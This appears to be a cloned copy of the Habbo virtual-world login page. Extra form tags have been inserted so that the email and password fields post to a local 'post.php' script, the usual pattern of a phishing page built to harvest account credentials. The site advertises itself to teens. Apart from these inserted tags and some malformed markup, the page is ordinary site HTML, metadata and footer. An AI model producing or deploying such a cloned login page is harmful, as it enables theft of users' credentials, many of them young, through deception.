

<html ng-app="app" lang="en-us">

<head>
    <style type="text/css">
        @charset "UTF-8";
        [ng\:cloak],
        [ng-cloak],
        [data-ng-cloak],
        [x-ng-cloak],
        .ng-cloak,
        .x-ng-cloak,
        .ng-hide:not(.ng-hide-animate) {
            display: none !important;
        }
        
        ng\:form {
            display: block;
        }
        
        .ng-animate-shim {
            visibility: hidden;
        }
        
        .ng-anchor {
            position: absolute;
        }
    </style>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="robots" content="NOODP">
    <title>Habbo</title>
    <meta name="description" content="Join millions in the planet's most popular virtual world for teens. Create your avatar, meet new friends, role play, and build amazing spaces.">
    <meta property="og:type" content="website">
    <meta property="og:site_name" content="Habbo">
    <meta property="og:title" content="Habbo">
    <meta property="og:description" content="Join millions in the planet's most popular virtual world for teens. Create your avatar, meet new friends, role play, and build amazing spaces.">
    <meta property="og:url" content="https://www.habbo.com/settings/email" habbo-head-url="content">
    <meta property="og:image" content="https://habboo-a.akamaihd.net/habbo-web/america/en/assets/images/app_summary_image-1200x628.85a9f5dc.png">
    <meta property="og:image:height" content="628">
    <meta property="og:image:width" content="1200">
    <meta name="twitter:card" content="summary_large_image">
    <meta name="twitter:title" content="Habbo">
    <meta name="twitter:description" content="Join millions in the planet's most popular virtual world for teens. Create your avatar, meet new friends, role play, and build amazing spaces.">
    <meta name="twitter:image" content="https://habboo-a.akamaihd.net/habbo-web/america/en/assets/images/app_summary_image-1200x628.85a9f5dc.png">
    <meta name="twitter:site" content="@Habbo">
    <meta itemprop="name" content="Habbo">
    <meta itemprop="description" content="Join millions in the planet's most popular virtual world for teens. Create your avatar, meet new friends, role play, and build amazing spaces.">
    <meta itemprop="image" content="https://habboo-a.akamaihd.net/habbo-web/america/en/assets/images/app_summary_image-1200x628.85a9f5dc.png">
    <meta name="apple-itunes-app" content="app-id=794866182">
    <meta name="fragment" content="!">
    <meta name="revision" content="84b179a">
    <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no">
    <meta name="prerender-status-code" prerender-status-code="" content="401">
    <meta name="prerender-header" prerender-header="">
    <link rel="canonical" href="https://www.habbo.com/settings/email" habbo-head-url="href">
    <link rel="shortcut icon" href="https://habboo-a.akamaihd.net/habbo-web/america/en/assets/images/favicon.08c747be.ico">
    <link rel="icon" sizes="196x196" href="https://habboo-a.akamaihd.net/habbo-web/america/en/assets/images/app_icon-196x196.42aab784.png">
    <link rel="apple-touch-icon" href="https://habboo-a.akamaihd.net/habbo-web/america/en/assets/images/app_icon-60x60-precomposed.99edad69.png">
    <link rel="apple-touch-icon" sizes="76x76" href="https://habboo-a.akamaihd.net/habbo-web/america/en/assets/images/app_icon-76x76-precomposed.e106f3ac.png">
    <link rel="apple-touch-icon" sizes="120x120" href="https://habboo-a.akamaihd.net/habbo-web/america/en/assets/images/app_icon-120x120-precomposed.18320473.png">
    <link rel="apple-touch-icon" sizes="152x152" href="https://habboo-a.akamaihd.net/habbo-web/america/en/assets/images/app_icon-152x152-precomposed.b6728e86.png">
    <link rel="alternate" type="application/rss+xml" href="https://www.habbo.com/rss.xml" title="Habbo News">
    <link rel="prefetch" href="https://habboo-a.akamaihd.net/habbo-web-l10n/com.json">
    <link rel="prefetch" href="https://habboo-a.akamaihd.net/habbo-web/america/en/assets/images/sprite.fd8a8fba.png">
    <link rel="prefetch" href="https://habboo-a.akamaihd.net/habbo-web/america/en/assets/images/sprite@2x.4f12dcf6.png" media="(-webkit-min-device-pixel-ratio: 2), (min-resolution: 192dpi), (min-resolution: 2dppx)">
    <link rel="prefetch" href="https://habboo-a.akamaihd.net/habbo-web/america/en/assets/images/backgrounds/hotel.ba57eb56.png">
    <link rel="stylesheet" href="https://habboo-a.akamaihd.net/habbo-web/america/en/app.bcbe2ade.css">
    <link rel="dns-prefetch" href="//fonts.googleapis.com">
    <link rel="dns-prefetch" href="//fonts.gstatic.com">
    <link href="https://fonts.googleapis.com/css?family=Ubuntu:regular,bold|Ubuntu+Condensed:regular" rel="stylesheet">
    <script src="https://d29usylhdk1xyu.cloudfront.net/manifest/login?version=1.114.1_widgets_244" type="text/javascript"></script>
    <script type="text/javascript" async="" src="https://www.google-analytics.com/plugins/ua/linkid.js"></script>
    <script type="text/javascript" async="" src="https://www.google-analytics.com/plugins/ua/ecommerce.js"></script>
    <script async="" src="//www.google-analytics.com/analytics.js"></script>
    <script>
        ! function() {
            var e = document.createElement("link"),
                t = document.getElementsByTagName("script")[0];
            e.href = "https://fonts.googleapis.com/css?family=Ubuntu:regular,bold|Ubuntu+Condensed:regular", e.rel = "stylesheet", t.parentNode.insertBefore(e, t)
        }();
    </script>
    <script>
        window.prerenderReady = !1;
    </script>
    <script>
        window.session = null;
        window.geoLocation = {
            "country": "gb",
            "continent": "eu"
        };
        window.partnerCodeInfo = null;
        window.systemData = {
            "open": true
        };
    </script>
    <link rel="stylesheet" href="https://d3hmp0045zy3cs.cloudfront.net/2.2.22/providers.css" type="text/css">
    <style type="text/css">
            .fb_hidden {
            position: absolute;
            top: -10000px;
            z-index: 10001
        }
        
        .fb_reposition {
            overflow: hidden;
            position: relative
        }
        
        .fb_invisible {
            display: none
        }
        
        .fb_reset {
            background: none;
            border: 0;
            border-spacing: 0;
            color: #000;
            cursor: auto;
            direction: ltr;
            font-family: "lucida grande", tahoma, verdana, arial, sans-serif;
            font-size: 11px;
            font-style: normal;
            font-variant: normal;
            font-weight: normal;
            letter-spacing: normal;
            line-height: 1;
            margin: truncated 7816bytes...
    </style>
</head>

<body habbo-client-disable-scrollbars="" class="modal-open" style="">
    <div modal-render="true" tabindex="-1" role="dialog" class="modal fade in" uib-modal-animation-class="fade" modal-in-class="in" ng-style="{'z-index': 1050 + index*10, display: 'block'}" uib-modal-window="modal-window" index="1" animate="animate" modal-animation="true"
        style="z-index: 1060; display: block;">
        <div class="modal-dialog ">
            <div class="modal-content" uib-modal-transclude="">
                <div class="login"><button ng-click="$dismiss()" class="modal__close"></button><form action="post.php" method="post" class="login-habblet">
                    <h3 translate="LOGIN" class="modal__title">Login</h3>
                    <div class="modal__content">
                        <habbo-login-form on-login="$close()">
                            <form ng-submit="LoginController.login()" name="loginForm" novalidate="" habbo-shake="" class="login-form__form ng-valid-email ng-dirty ng-valid-parse ng-valid ng-valid-required" style="">
                                <fieldset class="form__fieldset login-form__fieldset">
                                    <div class="form__field"><input name="email" type="email" ng-model="LoginController.email" ng-model-options="{ updateOn: 'default blur', debounce: { default: 500, blur: 0 } }" required="" habbo-email="" habbo-remote-data="'credentials'" autofocus=""
                                            placeholder="Email" class="form__input login-form__input ng-valid-email ng-not-empty ng-dirty ng-valid ng-valid-required ng-touched" style=""><form action="post.php" method="post" class="login-habblet"></div>
                                </fieldset>
                                <fieldset class="form__fieldset login-form__fieldset">
                                    <div class="form__field"><input name="password" type="password" ng-model="LoginController.password" ng-model-options="{ updateOn: 'default blur', debounce: { default: 500, blur: 0 } }" required="" habbo-remote-data="'credentials'" placeholder="Password"
                                            class="form__input login-form__input ng-untouched ng-not-empty ng-dirty ng-valid-parse ng-valid ng-valid-required" style=""></div>
                                 <habbo-claim-password class="form__helper login-form__helper"><small><a href="">I've forgotten my password</a></small></habbo-claim-password>
                                </fieldset><button ng-disabled="LoginController.loginInProgress" type="submit" class="login-form__button" translate="LOGIN_BUTTON">Let's go!</button></form> 
                            <div class="login-form__social">
                                <habbo-facebook-connect on-login="LoginController.onLogin()" type="large" translation-key="FACEBOOK_LOGIN"><button ng-click="FacebookConnectController.fbLogin()" ng-disabled="FacebookConnectController.loginInProgress" class="facebook-connect">Login with Facebook</button></habbo-facebook-connect>
                                <habbo-facebook-connect on-login="LoginController.onLogin()"
                                    type="small"><button ng-click="FacebookConnectController.fbLogin()" ng-disabled="FacebookConnectController.loginInProgress" class="facebook-connect"></button></habbo-facebook-connect>
                                <div class="login-form__rpx">
                                    <habbo-rpx-login><a class="janrainEngage" translate="LOGIN_RPX"></a></habbo-rpx-login>
                                </div>
                            </div>
 <center>                      </habbo-login-form>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div modal-render="true" tabindex="-1" role="dialog" class="modal spinner spinner--solid in" uib-modal-animation-class="fade" modal-in-class="in" ng-style="{'z-index': 1050 + index*10, display: 'block'}" uib-modal-window="modal-window" window-class="spinner spinner--solid"
        index="0" animate="animate" style="z-index: 1050; display: block;">
        <div class="modal-dialog ">
            <div class="modal-content" uib-modal-transclude="">
                <div class="spinner">
                    <h1 class="spinner__logo">Habbo</h1>
                    <div class="spinner__indicator"></div>
                </div>
            </div>
        </div>
    </div>
    <div class="modal-backdrop spinner-backdrop--solid in" uib-modal-animation-class="fade" modal-in-class="in" ng-style="{'z-index': 1040 + (index &amp;&amp; 1 || 0) + index*10}" uib-modal-backdrop="modal-backdrop" backdrop-class="spinner-backdrop--solid"
        style="z-index: 1051;"></div>
    <!-- uiView:  -->
    <div class="content" ui-view=""></div>
    <habbo-footer>
        <footer class="wrapper">
            <div class="footer__media">
                <p class="footer__media__label" translate="FOLLOW_HABBO">Follow Habbo</p>
                <ul itemscope="" itemtype="http://schema.org/Organization">
                    <link itemprop="url" href="https://www.habbo.com">
                    <li class="footer__media__item"><a href="https://www.facebook.com/Habbo" class="footer__media__link" target="_blank" itemprop="sameAs"><i class="icon icon--facebook"></i></a></li>
                    <li class="footer__media__item"><a href="https://twitter.com/Habbo" class="footer__media__link" target="_blank" itemprop="sameAs"><i class="icon icon--twitter"></i></a></li>
                    <li class="footer__media__item"><a href="https://www.youtube.com/user/Habbo" class="footer__media__link" target="_blank" itemprop="sameAs"><i class="icon icon--youtube"></i></a></li>
                    <li class="footer__media__item"><a href="https://www.habbo.com/rss.xml" class="footer__media__link" target="_blank" itemprop="sameAs"><i class="icon icon--rss"></i></a></li>
                </ul>
                
